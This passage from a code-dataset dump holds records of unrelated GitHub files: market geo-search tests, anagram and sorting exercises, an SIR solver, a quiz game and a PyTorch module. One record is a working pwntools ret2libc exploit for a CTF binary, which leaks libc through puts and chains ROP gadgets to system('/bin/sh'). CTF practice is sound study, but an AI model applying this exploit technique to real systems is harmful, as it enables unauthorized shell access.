regions=[1], delivery_service_outlets=[12345672]),\n ]\n\n cls.index.offers += [\n Offer(fesh=73001, title='offer from mega points 0 and 1 : 1', pickup_buckets=[2300, 2301]),\n Offer(fesh=73002, title='offer from mega points 0 and 1 : 2', pickup_buckets=[2300, 2301]),\n Offer(fesh=73003, title='offer from mega point 2 : 1', pickup_buckets=[2302]),\n ]\n\n cls.index.outlets += [\n Outlet(\n point_id=12345670,\n region=1,\n gps_coord=GpsCoord(37.1, 55.1),\n point_type=Outlet.FOR_PICKUP,\n delivery_service_id=270,\n ),\n Outlet(point_id=12345671, region=1, gps_coord=GpsCoord(37.15, 55.1), delivery_service_id=270),\n Outlet(point_id=12345672, region=1, gps_coord=GpsCoord(37.15, 55.15), fesh=73003),\n ]\n\n def test_show_outlet_entities(self):\n '''\n Проверяем логику работы geo с мега-точками: в один аутлет может доставлять несколько магазинов.\n Для этого geo должен возвращать по одному офферу на каждый аутлет\n и возвращать ответ results в другому формате: массив аутлетов, внутри которых лежит один оффер.\n Вся новая логика работает только при переданном параметре show-outlet-entities=true.\n '''\n req = 'place=geo&text=mega&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&rids=1&debug=da&how=search&show-outlet=offers'\n # Проверка старого формата. Всего 5 офферов из 3-х магазинов. 
Some of them share delivery points, but there is no grouping by outlet\n response = self.report.request_json(req)\n self.assertFragmentIn(\n response,\n [\n # two points for shop 73001\n {\n 'titles': {'raw': 'offer from mega points 0 and 1 : 1'},\n 'shop': {'id': 73001},\n 'outlet': {'id': '12345670'},\n },\n {\n 'titles': {'raw': 'offer from mega points 0 and 1 : 1'},\n 'shop': {'id': 73001},\n 'outlet': {'id': '12345671'},\n },\n # the same points for shop 73002\n {\n 'titles': {'raw': 'offer from mega points 0 and 1 : 2'},\n 'shop': {'id': 73002},\n 'outlet': {'id': '12345670'},\n },\n {\n 'titles': {'raw': 'offer from mega points 0 and 1 : 2'},\n 'shop': {'id': 73002},\n 'outlet': {'id': '12345671'},\n },\n # one point for shop 73003\n {'titles': {'raw': 'offer from mega point 2 : 1'}, 'shop': {'id': 73003}, 'outlet': {'id': '12345672'}},\n ],\n )\n\n # Check the new format with grouping by outlet\n response = self.report.request_json(req + '&show-outlet-entities=true')\n self.assertFragmentIn(\n response,\n {\n \"results\": [\n {\n \"entity\": \"outlet\",\n \"id\": \"12345670\",\n \"isMegaPoint\": True,\n \"serviceId\": 270,\n \"offer\": {\n \"entity\": \"offer\",\n },\n },\n {\n \"entity\": \"outlet\",\n \"id\": \"12345671\",\n \"isMegaPoint\": True,\n \"serviceId\": 270,\n \"offer\": {\n \"entity\": \"offer\",\n },\n },\n {\n \"entity\": \"outlet\",\n \"id\": \"12345672\",\n \"isMegaPoint\": False,\n \"serviceId\": 99,\n \"offer\": {\n \"entity\": \"offer\",\n },\n },\n ]\n },\n allow_different_len=False,\n )\n\n '''\n Test that filters and sorts are absent inside search\n '''\n self.assertFragmentIn(response, {\"search\": {\"results\": [], \"filters\": Absent(), \"sorts\": Absent()}})\n\n @classmethod\n def prepare_regset(cls):\n cls.index.shops += [Shop(fesh=73004)]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=90002,\n options=[PickupOption(outlet_id=90002, price=100)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n cls.index.outlets += [\n Outlet(point_id=90002, region=2, gps_coord=GpsCoord(37.15, 55.15), fesh=73004),\n ]\n\n cls.index.offers += [Offer(fesh=73004, title='offer', pickup_buckets=[90002])]\n\n def test_regset(self):\n '''\n Check how regset=1 works\n Check that with a rids=1 request and an outlet from rids=2 the offer is returned\n '''\n response = self.report.request_json('place=geo&fesh=73004&point_id=90002&rids=1&regset=1')\n self.assertFragmentIn(\n response,\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"offer\"},\n },\n )\n\n ''' Check that without regset=1 and with rids=2 the offer is present (a request from the outlet's region) '''\n response = self.report.request_json('place=geo&fesh=73004&point_id=90002&rids=2')\n self.assertFragmentIn(\n response,\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"offer\"},\n },\n )\n\n ''' Check that with regset=1 and with rids=2 the offer is present (a request from the outlet's region) '''\n response = self.report.request_json('place=geo&fesh=73004&point_id=90002&rids=2&regset=1')\n self.assertFragmentIn(\n response,\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"offer\"},\n },\n )\n\n ''' Check that without regset=1 there is no offer (since this outlet is not from the user's region) '''\n response = self.report.request_json('place=geo&fesh=73004&point_id=90002&rids=1')\n self.assertFragmentNotIn(\n response,\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"offer\"},\n },\n )\n\n virtual_model_id_range_start = int(2 * 1e12)\n virtual_model_id_range_finish = int(virtual_model_id_range_start + 1e15)\n virtual_model_id = 
(virtual_model_id_range_start + virtual_model_id_range_finish) // 2\n\n @classmethod\n def prepare_virtual_model(cls):\n cls.index.shops += [\n Shop(fesh=4242, priority_region=1, name='Shop11'),\n ]\n\n cls.index.outlets += [\n Outlet(point_id=4242, fesh=4242, region=1, gps_coord=GpsCoord(37.1, 55.1), point_type=Outlet.FOR_STORE),\n ]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=4242,\n fesh=4242,\n carriers=[99],\n options=[PickupOption(outlet_id=4242)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n cls.index.offers += [\n Offer(\n waremd5='OfferNoModel_________g',\n title=\"Наковальня #10\",\n fesh=4242,\n hid=4242,\n pickup_buckets=[4242],\n virtual_model_id=T.virtual_model_id,\n ),\n ]\n\n def test_virtual_model(self):\n # Virtual card flags are now enabled by default\n request_base = (\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=%s&rids=0'\n % T.virtual_model_id\n )\n flags = '&rearr-factors=market_cards_everywhere_range={}:{}'.format(\n T.virtual_model_id_range_start, T.virtual_model_id_range_finish\n )\n response = self.report.request_json(request_base + flags)\n self.assertFragmentIn(\n response,\n {\n \"search\": {\n \"total\": 1,\n \"shops\": 1,\n \"shopOutlets\": 1,\n \"results\": [\n {\n \"entity\": \"offer\",\n \"bundleCount\": 1,\n \"bundled\": {\n \"count\": 1,\n \"modelId\": T.virtual_model_id,\n \"outletId\": 4242,\n },\n \"wareId\": \"OfferNoModel_________g\",\n \"outlet\": {\n \"id\": \"4242\",\n },\n },\n ],\n },\n },\n allow_different_len=False,\n )\n\n for flags in [\n '&rearr-factors=market_cards_everywhere_geo=0',\n '&rearr-factors=market_cards_everywhere_geo=1;market_cards_everywhere_range={}:{}'.format(\n T.virtual_model_id_range_start, T.virtual_model_id_range_start + 1\n ),\n ]:\n response = self.report.request_json(request_base + flags)\n self.assertFragmentIn(\n response,\n {\n \"search\": {\"total\": 0, \"shops\": 0, \"shopOutlets\": 0, \"results\": NoKey(\"results\")},\n },\n allow_different_len=False,\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_geo.py","file_name":"test_geo.py","file_ext":"py","file_size_in_byte":147743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30220204255","text":"# Import the module and create a connection\nfrom pymongo import MongoClient\n\nclient = MongoClient()\n# Written like this for the local default port; otherwise it may need changes\n\n# The local port has been changed:\nclient = MongoClient('mongodb://localhost:28017/')\n\n# Select the database\ndb = client.local\n\n# Select the collection; oplog.rs is the collection that stores the log\ncollection = db.oplog.rs\n\n# find_one() returns a single result, find() returns a cursor (generator-like) object\n# About find: https://www.cnblogs.com/huang-yc/p/10453275.html\nresult = collection.find({'age':{'$gt':20}})\n\n# On the meaning of some fields in the oplog:\n#op: the write operation that should be applied to the slave. n indicates a no-op, this is just an informational message.\n#ns: the database and collection affected by this operation. Since this is a no-op, this field is left blank.\n#o: the actual document representing the op. 
Since this is a no-op, this field is pretty useless. The _id field is here; there are also many values like i, n, c, etc.\n#i: insert; u: update; d: delete; c: db cmd; n: no-op\n#wall: wall-clock time with millisecond granularity.\n#Note that the o field's format differs from the other fields; o is a bson.D structure (an array of nested fields)\n\n#For writing data into MongoDB, mainly the insertOne(), insertMany() methods\n#db.collection.insertOne(\n# <document>,\n# {\n# writeConcern: <document>\n# }\n#)\n#_id is the primary key, corresponding to ObjectId(\"...\")","repo_name":"kiki123meng/temp","sub_path":"sandbox/mongotest.py","file_name":"mongotest.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22559347881","text":"'''\nAuthor: Ivy Xue\nTime: 11/23/2020\nThis file solves the Anagram Problem.\nDescription: An anagram is a word or phrase made by transposing the letters of another word or phrase.\nInput Parameters: two words s1, s2 with the same length, all letters lower case.\nThe function will return whether the two words are anagrams.\nReturn: True or False\n'''\n\ndef anagram1(s1,s2):\n '''\n This function will iterate through s1 and find out whether each character in s1 can be found correspondingly in s2.\n There are nested loops in this algorithm. \n This is an O(n^2) algorithm.\n '''\n pos1 = 0\n list2 = list(s2)\n stillOK = True\n while pos1 < len(s1) and stillOK :\n pos2 = 0\n found = False\n while pos2 < len(list2) and not found: \n if s1[pos1] == list2[pos2]:\n found = True\n else:\n pos2 = pos2 + 1\n if found :\n list2[pos2] = None\n else :\n stillOK = False\n pos1 = pos1 + 1\n return stillOK\n\n\ndef anagram2(s1,s2):\n '''\n This function will convert s1,s2 to lists, sort them, and\n find out whether the sorted lists are exactly the same.\n The sorting method dominates the algorithm.\n This is an O(n^2) or O(n log n) algorithm, depending on the sorting method.\n '''\n list1 = list(s1)\n list2 = list(s2)\n list1.sort()\n list2.sort()\n stillOK = True\n for i in range(len(s1)):\n if list1[i] != list2[i]:\n stillOK = False\n break\n return stillOK\n\ndef anagram3(s1,s2):\n '''\n This function will count the frequency of the 26 characters in s1,s2 using a 26-element list, and \n find out whether the counts are exactly the same.\n This is an O(n) algorithm.\n '''\n count1 = [0]*26\n count2 = [0]*26\n stillOK = True\n for i in range(len(s1)):\n pos = ord(s1[i]) - ord(\"a\")\n count1[pos] = count1[pos] + 1\n for i in range(len(s2)):\n pos = ord(s2[i]) - ord(\"a\")\n count2[pos] = count2[pos] + 1\n for i in range(len(count1)):\n if count1[i] != count2[i]:\n stillOK = False\n return stillOK\n\ndef anagram4(s1,s2):\n '''\n This function will count the frequency of the 26 characters in s1,s2 using a dictionary, and 
\n find out whether the counts are exactly the same.\n This is an O(n) algorithm.\n '''\n dict1 = dict()\n dict2 = dict()\n stillOK = True\n for c in s1:\n if c not in dict1:\n dict1[c] = 1\n else:\n dict1[c] += 1\n for c in s2:\n if c not in dict2:\n dict2[c] = 1\n else:\n dict2[c] += 1\n return dict1 == dict2\n \n\nif __name__ == \"__main__\":\n print(anagram1('python','typhon'))\n print(anagram1('hhhhhh','typhon'))\n print(anagram2('python','typhon'))\n print(anagram2('hhhhhh','typhon'))\n print(anagram3('python','typhon'))\n print(anagram3('hhhhhh','typhon'))\n print(anagram4('python','typhon'))\n print(anagram4('hhhhhh','typhon'))\n \n\n","repo_name":"ivyxue16/Data-Structure","sub_path":"Code/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"15045112640","text":"from art import logo\nfrom art import vs\nfrom game_data import data\nfrom os import system\nimport random\n\n'''*************************************[Game-Code]**************************************'''\nplay_again = True \nwhile play_again == True:\n true = True \n your_score = 0\n while true == True:\n print(logo)\n # Display your score \n print(f'Your current Score: {your_score}')\n # 1st pick that will be compared with the next one\n rand_pick = random.choice(data)\n # print 1st pick \n print(f\"Compare A : {rand_pick['name']}, a {rand_pick['description']} from {rand_pick['country']}.\")\n # print VS logo \n print(vs)\n # 2nd pick to be compared with the 1st one\n vs_pick = random.choice(data)\n # print 2nd pick \n print(f\"Compare B : {vs_pick['name']}, a {vs_pick['description']} from {vs_pick['country']}.\")\n # compare and make a decision\n user_desc = str(input(\"who's got more followers? [A/B] \"))\n user_desc_Aa = user_desc.upper()\n while user_desc_Aa not in ['A' , 'B']:\n print('Invalid input!')\n user_desc = str(input(\"who's got more followers? [A/B] \"))\n user_desc_Aa = user_desc.upper()\n\n A = rand_pick['follower_count']\n B = vs_pick['follower_count']\n # print(user_desc_Aa) \n # print(A)\n # print(B)\n\n # decide which has more followers, A or B\n if B < A and user_desc_Aa == 'A':\n your_score +=1\n system('cls')\n elif B > A and user_desc_Aa == \"B\":\n your_score +=1\n system('cls')\n else:\n print('Wrong Choice!')\n true = False\n\n user_inpt = input('Play Again? [y/n]')\n while user_inpt not in ['y' , 'n']:\n print('Invalid input!')\n user_inpt = input('Play Again? 
[y/n]')\n\n if user_inpt == 'y':\n pass\n else:\n play_again = False\n\n \n'''**************************************[END]************************************************'''","repo_name":"SNEHASISHROY-125/vs_follower-game","sub_path":"vs follower-game.py","file_name":"vs follower-game.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2292538175","text":"# Combsort\r\nfrom time import time\r\nfrom random import randrange\r\nimport myplot as mp\r\n\r\nMIN = 1000\r\nMAX = 20000\r\nSTEP = 1000\r\n\r\ndef combsort(lista):\r\n gap = len(lista)\r\n changes = True\r\n while gap > 1 or changes:\r\n if gap > 1:\r\n gap = max(1,int(gap/1.3))\r\n changes = False\r\n i = 0\r\n #print (gap,changes,i)\r\n while i + gap <= len(lista)-1:\r\n #print(\"\\t\",i,gap,changes,lista[i],lista[i+gap])\r\n if lista[i] > lista[i+gap]:\r\n lista[i],lista[i+gap] = lista[i+gap],lista[i]\r\n changes = True\r\n #print(\"\\t\\t\",changes)\r\n i += 1\r\n return lista\r\n\r\ndef main():\r\n\r\n sizes = []\r\n timings = []\r\n\r\n for i in range(MIN,MAX+1,STEP):\r\n sizes.append(i)\r\n lista = [randrange(1,MAX) for i in range(i)]\r\n t0 = time()\r\n lista = combsort(lista)\r\n t = time() - t0\r\n timings.append(t)\r\n print(\"Sorting {} integers took {:.3f} seconds\".format(i,t))\r\n print(\"Plotting results...\")\r\n mp.plotsetup(mywidth = 600, myheight = 600, xmin = 0, ymin = 0, \\\r\n xmax = MAX, ymax = max(timings), xgridsize = STEP, \\\r\n ygridsize = 2*min(timings), xlabel = 'n',\r\n ylabel = 'time (sec.)', plottitle = 'Combsort' )\r\n mp.plotcurve(sizes, timings, 'red')\r\n mp.plotfinish()\r\n \r\nmain()\r\n","repo_name":"slimebob1975/python-edu","sub_path":"combsort.py","file_name":"combsort.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17165257660","text":"from pwn import *\r\nimport sys\r\nremote_addr = [\"node4.buuoj.cn\",25055]\r\nlibc = ELF('./libc-2.27.so')\r\nelf = ELF('./ciscn_2019_n_5')\r\nif len(sys.argv) == 1:\r\n context.log_level=\"debug\" \r\n #p = process([\"qemu-aarch64\", \"-L\", \"/usr/aarch64-linux-gnu/\", \"-g\",\"1234\",\"./stack\"]) \r\n #p = process([\"qemu-aarch64\", \"-L\", \".\", \"./stack\"]) \r\n p = process(\"./ciscn_2019_n_5_patched\")\r\n context(arch='amd64', os='linux')\r\n context.terminal = ['tmux', 'splitw', '-h']\r\nif len(sys.argv) == 2 :\r\n if 'r' in sys.argv[1]:\r\n p = remote(remote_addr[0],remote_addr[1])\r\n if 'n' not in sys.argv[1]:\r\n context.log_level=\"debug\" \r\n #context(arch = 'amd64', os = 'linux')\r\nr = lambda : p.recv()\r\nrl = lambda : p.recvline()\r\nrc = lambda x: p.recv(x)\r\nru = lambda x: p.recvuntil(x)\r\nrud = lambda x: p.recvuntil(x, drop=True)\r\ns = lambda x: p.send(x)\r\nsl = lambda x: p.sendline(x)\r\nsa = lambda x, y: p.sendafter(x, y)\r\nsla = lambda x, y: p.sendlineafter(x, y)\r\nshell = lambda : p.interactive()\r\npr = lambda name,x : log.info(name+':'+hex(x))\r\n\r\nDEBUG = 1\r\n\r\ndef debug(bp = None):\r\n if DEBUG == 1:\r\n if bp != None:\r\n gdb.attach(p, bp)\r\n else:\r\n gdb.attach(p)\r\n\r\npop_rdi = 0x400713\r\nret = 0x4004c9\r\nputs_got = elf.got['puts']\r\nputs_plt = elf.plt['puts']\r\nmain = 0x400636\r\n\r\nsa(b'name\\n', b'a')\r\npayload = b'a' * (0x20 + 8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)\r\nsla(b'me?\\n', payload)\r\n\r\nlibc.address = u64(ru(b'\\x7f')[-6:].ljust(8, b'\\x00')) - 
libc.sym['puts']\r\npr('libc.address', libc.address)\r\n\r\nsystem = libc.sym['system']\r\nbinsh = next(libc.search(b'/bin/sh\\x00'))\r\n\r\nsa(b'name', b'a')\r\npayload = b'a' * (0x20 + 8) + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system)\r\nsla(b'me?\\n', payload)\r\n\r\n\r\nshell()\r\n","repo_name":"BattiestStone4/pwn-problems","sub_path":"ciscn2019_n_5/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"33899731695","text":"# coding: utf-8\nimport random\nfrom rect import Rect, SIZE\nfrom PIL import Image, ImageDraw, ImageFont\n\n\nclass BSPTree:\n def __init__(self, n_max_nodes=32):\n self.MAX_NODES = n_max_nodes\n self.root = TreeNode(label=\"A\")\n self._nodes = [self.root]\n self._leaves = [self.root]\n self.idx = 0\n self.last_label = \"A\"\n\n def _get_next_label(self):\n label = chr(ord(self.last_label)+1)\n self.last_label = label\n return label\n\n def add_n_nodes(self, n_nodes=10):\n for i in range(n_nodes):\n node = TreeNode(label=self._get_next_label())\n self.nodes.append(node)\n\n def _stop_condition_met(self):\n return len(self.nodes) >= self.MAX_NODES or len(self.nodes) == 0\n\n def _do_split(self):\n while not self._stop_condition_met():\n node = self._get_next_node()\n print(\"Processing node {}.\".format(node))\n self.leaves.remove(node)\n\n l_child = TreeNode(label=self._get_next_label())\n r_child = TreeNode(label=self._get_next_label())\n\n if random.random() > 0.5:\n split_func = node.rect.split_half\n else:\n split_func = node.rect.split\n\n l_child.rect, r_child.rect = split_func()\n\n if l_child.is_suitable():\n print(\"Created {}\".format(l_child))\n self.nodes.append(l_child)\n self.leaves.append(l_child)\n\n if r_child.is_suitable():\n print(\"Created {}\".format(r_child))\n self.nodes.append(r_child)\n self.leaves.append(r_child)\n\n def _get_next_node(self):\n assert self.idx < len(self.nodes), u\"Trying to access invalid position {}\".format(self.idx)\n res = self.nodes[self.idx]\n self.idx += 1\n return res\n\n @property\n def leaves(self):\n return self._leaves\n\n @property\n def nodes(self):\n return self._nodes\n\n @property\n def rects(self):\n return [leaf.rect for leaf in self._leaves]\n\n\nclass TreeNode:\n def __init__(self, label=\"\"):\n self.rect = Rect(0, 0, *SIZE)\n self.label = label\n\n def is_suitable(self):\n \"\"\" Testing if this instance is suitable. 
Wraps is_suitable() from Rect \"\"\"\n\n return self.rect.is_suitable()\n\n def __str__(self):\n return u\"<{}> {}\".format(self.label, self.rect)\n\n\ndef print_bsp(tree, name=\"bsp_tree_test.bmp\"):\n font = ImageFont.truetype(\"Ubuntu-R.ttf\", 14)\n im = Image.new('RGB', SIZE)\n draw = ImageDraw.Draw(im)\n\n fill = 'blue'\n outline = 'black'\n\n for node in tree.leaves:\n coords = list(node.rect._switch_coordinates())\n draw.rectangle(coords, fill, outline)\n draw.text(xy=node.rect._get_center(), text=node.label.upper(), fill=(0, 0, 0), font=font)\n\n im.save(name)\n","repo_name":"luizpericolo/ppgi-masi-dissertacao","sub_path":"src/bsp.py","file_name":"bsp.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37756102159","text":"#coding=utf-8\nimport sys\n\ndef top_k_num(n, m, k):\n\n l, r = 1, n * m + 1\n while l < r:\n mid = (l + r) // 2\n count = 0\n temp = mid - 1\n for i in range(1, n + 1):\n count += min(m, temp // i)\n if count >= k:\n r = mid\n else:\n l = mid + 1\n return l - 1\n\nif __name__ == \"__main__\":\n\n n, m, k = list(map(int, sys.stdin.readline().strip().split()))\n\n print(top_k_num(n, m, k))","repo_name":"wuyaqiang/Algorithm_Learn","sub_path":"笔试题 记录/秋招/拼多多 - 寻梦计划/No_4.py","file_name":"No_4.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33299267116","text":"\"\"\"\r\nSolves the SIR system of ODEs over a number of parameters in serial\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom scipy.integrate import solve_ivp\r\nimport matplotlib.pyplot as plt\r\n\r\n#time points to solve at\r\ntpts = np.linspace(0,200,1001) #run longer\r\n\r\n#initial values as population fractions\r\nI0 = 1e-2\r\nR0 = 0\r\n\r\n# parameter values\r\nparams = {}\r\nparams['beta'] = 1.4247\r\nparams['gamma'] = 0.14286\r\nparams['mu'] = 0.01\r\n\r\nbeta_list = np.linspace(0,4,10001) #up this by an order of magnitude to slow it down\r\n\r\n##################################\r\n\r\n# vectorize initial conditions\r\nx0 = np.array([1-I0-R0, I0, R0])\r\n\r\n# define ode equations\r\ndef SIR_ODEs_beta(t,x,params,beta):\r\n '''This function returns the time derivatives of S,I,R.\r\n\r\n The ode solver expects the first two arguments to be t and x\r\n NOTE: This is the OPPOSITE order from scipy.integrate.odeint!!\r\n\r\n The params argument should be a dict with beta, gamma, and mu as keys.\r\n It is passed into the solver via the args keyword.\r\n '''\r\n\r\n S = x[0]; I = x[1]; R = x[2]\r\n dx = np.zeros(3)\r\n\r\n dx[0] = -beta*S*I + params['mu']*(I+R)\r\n dx[1] = beta*S*I - params['gamma']*I - params['mu']*I\r\n dx[2] = params['gamma']*I - params['mu']*R\r\n\r\n return dx\r\n\r\n##### Solve procedure #####\r\n# For each beta in beta_list, solve the system of ODEs\r\n# Save only the solution at the final time.\r\nfsol = []\r\nfor beta in beta_list:\r\n sol = solve_ivp(SIR_ODEs_beta, t_span=[tpts[0], tpts[-1]], y0=x0, \r\n args=(params,beta))\r\n fsol.append(sol.y[:,-1])\r\n\r\n##### Plot result #####\r\nfig = plt.figure(figsize=(9,7))\r\nfsol = np.array(fsol)\r\nplt.plot(beta_list,fsol[:,0],beta_list,fsol[:,1],beta_list,fsol[:,2])\r\nplt.legend(['S-final','I-final','R-final'])\r\nplt.title(\"Plot of $S,I,R$ final by $\\\\beta$\")\r\nplt.xlabel(\"$\\\\beta$\")\r\nplt.ylabel(\"population 
fraction\")\r\nplt.show()\r\n\r\n","repo_name":"mountaindust/Python_tutorial","sub_path":"SIR_params.py","file_name":"SIR_params.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8178602493","text":"def tax(salary):\n if salary>2000:\n t=salary*21/100\n else:\n t=salary*15/100\n return t\nsalary1=int(input(\"enter your salary:\"))\nprint(\"----------------------------------------------\")\nprint(\"your annual NET pay is:\",int(salary1-tax(salary1)))\nprint(\"your monthly NET pay is:\",int((salary1-tax(salary1))/12))\n","repo_name":"l3umh/PythonWeek","sub_path":"tax.py","file_name":"tax.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3690472088","text":"from email.utils import quote\r\nfrom products import *\r\nfrom products_handle import *\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n q = QueryHandler(\"127.0.0.1\", \"sqlassignment\", \"root\", \"\")\r\n p1 = products(\"13f45ghtd4\", \"p11\", 35)\r\n p2 = products(\"9fktjrne7g\", \"p22\", 54)\r\n p3 = products(\"1fsc378623\", \"p33\", 25)\r\n p4 = products(\"3453fsc942\", \"p44\", 15)\r\n # PRINTING products information\r\n print(p1.__str__())\r\n # Showing all products\r\n show_all_products(q)\r\n # adding products to the database\r\n adding_product(p1, q)\r\n adding_product(p2, q)\r\n adding_product(p3, q)\r\n adding_product(p4, q)\r\n adding_product(p1, q)\r\n \r\n # Showing all products\r\n show_all_products(q)\r\n # deleting products\r\n delete_product(p3.barcode, q)\r\n # Showing all products\r\n show_all_products(q)\r\n # Activating the code\r\n start_Code(q)\r\n except ValueError as v:\r\n print(v)\r\n # Activating the code after printing the error\r\n start_Code(q)\r\n except TypeError as t:\r\n print(t)\r\n start_Code(q)","repo_name":"EbraFH/Python-SQL-Assessment","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8592071818","text":"from tkinter import *\n#Everything in tkinter is a widget\n\nroot = Tk()\n\n#define what the button will do\ndef myClick():\n\tmyLabel = Label(root, text=\"Look! 
I clicked a Button!!\")\n\tmyLabel.pack()\n\n#set up button widget\nmyButton = Button(root, text = \"Click Me!\", command=myClick, fg=\"blue\", bg=\"#000000\")\nmyButton.pack()\n\nroot.mainloop()\n","repo_name":"declan-1992/Tkinter-Tutorial","sub_path":"buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32413501134","text":"from rich.table import Table\nfrom rich.console import Console\n\ndef print_Table(alias_list,alias):\n table = Table(title=alias)\n table.add_column(\"Alias\", style=\"\", no_wrap=True, justify=\"center\")\n table.add_column(\"Definition\", style=\"green\", justify=\"center\")\n for i in alias_list:\n table.add_row(i[0],i[1])\n console = Console()\n console.print(table)","repo_name":"osaeljm/sudo_reader","sub_path":"rich_module.py","file_name":"rich_module.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72381192552","text":"from numpy import sin, cos\nimport torch\nfrom torch import Tensor, ones, device, cuda\nimport torch.nn as nn\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, embed_dim: int, sequence_length):\n super(PositionalEncoding, self).__init__()\n\n self.dev = device(\"cuda:0\" if cuda.is_available() else \"cpu\")\n\n self.embed_dim = embed_dim\n self.sequence_length = sequence_length\n\n self.positional_encoding = self.get_positional_embeddings()\n\n def get_positional_embeddings(self) -> Tensor:\n result = ones(self.sequence_length, self.embed_dim)\n\n for i in range(self.sequence_length):\n for j in range(self.embed_dim):\n result[i][j] = sin(i / (10000 ** (j / self.embed_dim))) \\\n if j % 2 == 0 \\\n else cos(i / (10000 ** ((j - 1) / self.embed_dim)))\n\n return result\n\n def forward(self, x: torch.FloatTensor) -> torch.FloatTensor:\n x += self.positional_encoding.repeat(x.shape[0], 1, 1).to(self.dev)\n\n return x\n","repo_name":"Thiggel/UnifiedTransformer","sub_path":"Transformer/PositionalEncoding.py","file_name":"PositionalEncoding.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72422264232","text":"import re\nimport os\nimport argparse\n\n\ndef delete_file(filepath):\n os.remove(filepath)\n print(\"File \" + filepath + \" deleted.\")\n\n\ndef find_pattern_in_directory(\n pattern: str, directory: str, delete_prompt: bool = False, non_interactive=False\n) -> None:\n regex = re.compile(pattern)\n try:\n for root, _, files in os.walk(directory):\n for filename in files:\n filepath = os.path.join(root, filename)\n with open(filepath, \"r\", errors=\"ignore\") as file:\n contents = file.read()\n if regex.search(contents):\n print(\"Pattern found in file:\" + filepath)\n if delete_prompt:\n if non_interactive:\n delete_file(filepath)\n continue\n response = input(\n filepath\n + \"Do you want to delete? 
(y/Y for yes, n/N for no): \",\n )\n if response.lower() == \"y\":\n delete_file(filepath)\n except PermissionError:\n print(\"Permission denied: \" + filepath)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Search for a pattern in files within a directory.\"\n )\n parser.add_argument(\n \"--pattern\",\n \"-p\",\n type=str,\n help=\"The pattern to search for.\",\n default=\"BEGIN.*KEY\",\n )\n parser.add_argument(\n \"--directory\",\n \"-d\",\n type=str,\n required=False,\n default=\"~/.ssh\",\n help=\"The directory to search within.\",\n )\n parser.add_argument(\n \"--delete\",\n action=\"store_true\",\n help=\"Prompt to delete the file if the pattern is found.\",\n )\n parser.add_argument(\n \"--non-interactive\",\n \"-i\",\n action=\"store_true\",\n help=\"Non-interactive mode.\",\n )\n args = parser.parse_args()\n\n find_pattern_in_directory(\n args.pattern, args.directory, args.delete, args.non_interactive\n )\n","repo_name":"SirAppSec/sshearch","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10255933662","text":"r\"\"\"Shared IR serialization logic used by TFleX python executor binary.\"\"\"\n\nimport base64\n\nfrom typing import Union\n\nfrom tfx.orchestration import metadata\nfrom tfx.orchestration.portable import data_types\nfrom tfx.proto.orchestration import executable_spec_pb2\nfrom tfx.proto.orchestration import execution_invocation_pb2\nfrom tfx.proto.orchestration import metadata_pb2\n\n\ndef deserialize_execution_info(\n execution_info_b64: str) -> data_types.ExecutionInfo:\n \"\"\"De-serializes the ExecutionInfo class from a url safe base64 encoded binary string.\"\"\"\n 